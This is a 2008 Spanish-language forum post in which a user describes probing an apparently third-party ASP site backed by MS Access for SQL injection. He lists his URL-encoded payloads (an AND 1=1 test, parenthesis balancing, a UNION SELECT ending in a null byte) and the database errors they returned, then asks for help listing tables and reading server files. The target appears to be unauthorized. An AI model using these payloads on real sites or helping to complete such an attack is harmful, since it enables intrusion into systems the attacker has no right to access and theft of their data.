Ayuda con MS Access SQL Injection...

Iniciado por xavierote, 7 Mayo 2008, 20:24 PM

0 Miembros y 1 Visitante están viendo este tema.

xavierote

¡Hola a todos! Os cuento mi pequeño reto que tengo entre yo y un servidor :P.
El caso es que he encontrado una página vulnerable a la Inyección SQL, el problema es muy gordo, y es que estoy bastante perdido con los comandos de este servidor.

Empiezo escribiendo por donde le entré:
programa.asp?NUMERO=48796543'%20AND%201=1

El valor de NUMERO es existente, pero me devolvió lo siguiente:
Microsoft JET Database Engine error '80040e14'

Syntax error in string in query epresionje '(((tabla.NUMERO) = '48796543' AND 1=1'))'.

programa.asp, line 214


Ahí me doy cuenta de los paréntesis. Están mal colocados. Por tanto prosigo a cambiarlos de lugar:
programa.asp?NUMERO=48796543'))%20AND%201=(('1

Y devuelve:
Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria epresionje.

programa.asp, line 214


Así también me da error, pero como en la primera consulta hemos conseguido la tabla y la columna a la que accede, intento obtener algún resultado:
programa.asp?NUMERO=48796543'))%20UNION%20SELECT%20*%20FROM%20tabla%20WHERE%20((NUMEROS='48796543%00

A mi entender, escribí esta consulta en la que debería de aparecer un valor verdadero si existe, ¿no?..... Pues no.... jeje:
Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match.

programa.asp, line 214


En fin. He probado muchas consultas más, y estoy un poco harto. Empecé con mi servidor local y haciéndome prácticas de SQL Injection y Blind SQL Injection, y satisfactoriamente conseguido. Ahora con este, no se obtener tablas o si se pueden conseguir ficheros del servidor (tipo en el Blind SQL Injection con la base de datos MySQL)...

Espero que me echéis una manita...

¡Un saludo!